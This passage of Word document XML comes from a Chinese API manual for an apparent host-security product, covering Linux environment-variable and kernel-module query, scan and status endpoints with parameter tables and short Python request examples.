            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="020CFD3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B327B0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA723D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/env/linux?key=HOME&amp;value=/home/yangwu&amp;user=yangwu&amp;sysEnv=false,true" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'key': 'HOME', 'value': '/home/qingteng', 'user': 'qingteng', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysEnv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>false,true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79160C6C" w14:textId="05BCCE3E" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7830B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc115166137"/>
      <w:bookmarkStart w:id="126" w:name="环境变量信息扫描"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r>
        <w:t>环境变量信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="159B27EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求环境变量信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5743ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5C7F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/env/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36654C16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6724BD69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078341AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B9690" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/env/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BF0CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35619DD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF067B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7BCEF"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62A7F490"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725CD70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05E2D0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17F3256A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65EF173E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="205B8728" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="658FD27C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB13A85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201EF595" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC012F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09A3A223" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="598ABA9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>环境变量信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25CB2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/env/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFD197" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc115166138"/>
      <w:bookmarkStart w:id="128" w:name="环境变量信息查询扫描状态"/>
      <w:bookmarkEnd w:id="126"/>
      <w:r>
        <w:t>环境变量信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="494864B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询环境变量信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BEE81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc115166139"/>
      <w:bookmarkStart w:id="130" w:name="内核模块信息"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>内核模块信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="7109D601" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163CA0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的内核模块信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4ACE35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD5824D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>内核模块信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F47C8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5ABFA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37775DBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953B6A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>内核模块信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B924DAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>内核模块信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BAC42E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>内核模块信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56050CD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACACF81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用内核模块信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71874633" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D1786" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C5967" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc115166140"/>
      <w:bookmarkStart w:id="132" w:name="内核模块信息查询结果"/>
      <w:r>
        <w:t>内核模块信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="0F1EA9A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询内核模块信息，按每台主机每个内核模块进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F07FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C26814" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernelmodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B1F81B7"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516"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FEE6D3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2BFF0AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2880A9E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B02342B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E983322" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E865256" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38E0332A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C17B2D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0434C11E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E15BA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BBE90B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42119578" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379FE979" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CCC885F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D986DF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0EFABD9E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C19D7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C3671B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61572E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68909D98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05C29F7A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4449115E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="422C1B1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31190AD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28C0C141" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
